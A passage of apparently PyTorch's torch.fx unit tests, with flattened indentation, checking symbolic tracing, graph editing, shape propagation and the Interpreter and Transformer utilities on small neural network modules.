self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_interpreter_default_args(self):
class Model(torch.nn.Module):
def forward(self, x, y=3.14159):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
out = interp.run(x)
torch.testing.assert_allclose(out, x + 3.14159)
def test_interpreter_not_enough_args(self):
class Model(torch.nn.Module):
def forward(self, x, y):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
with self.assertRaisesRegex(RuntimeError,
'Expected positional argument for parameter y, but one was not passed in'):
out = interp.run(x)
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_layout(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0)
traced = symbolic_trace(M())
x = torch.rand(5, 9, 3, 4)
self.assertEqual(traced(x), torch.zeros_like(x))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_prepend_self(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.prepend(b)
x.append(b)
self.assertEqual(len(graph.nodes), 3)
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(list(x.node.users.keys()), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(list(x.node.users.keys()), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_named_tuple_inlined(self):
class NamedTupMod(torch.nn.Module):
def forward(self, inp):
return wrapped_named_tup(Pair(inp, 1.2), p2=Pair(3.4, inp))
m = NamedTupMod()
input = torch.rand(3, 4)
ref = m(input)
traced = symbolic_trace(m)
res = traced(input)
self.assertEqual(ref, res)
# Check Pair NamedTuple works when inlined into the function call.
ph = call_func = None
for node in traced.graph.nodes:
if node.op == "placeholder":
ph = node
elif node.op == "call_function" and node.target == wrapped_named_tup:
node.update_arg(0, Pair(ph, 1.2))
node.update_kwarg("p2", Pair(3.4, ph))
call_func = node
break
self.assertTrue(call_func is not None)
self.assertTrue(isinstance(call_func.args[0], Pair))
self.assertTrue(isinstance(call_func.kwargs["p2"], Pair))
self.assertEqual(_format_arg(call_func.args[0]), "Pair(x=%inp, y=1.2)")
self.assertEqual(_format_arg(call_func.kwargs["p2"]), "Pair(x=3.4, y=%inp)")
traced.graph.eliminate_dead_code()
traced.recompile()
res = traced(input)
self.assertEqual(ref, res)
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
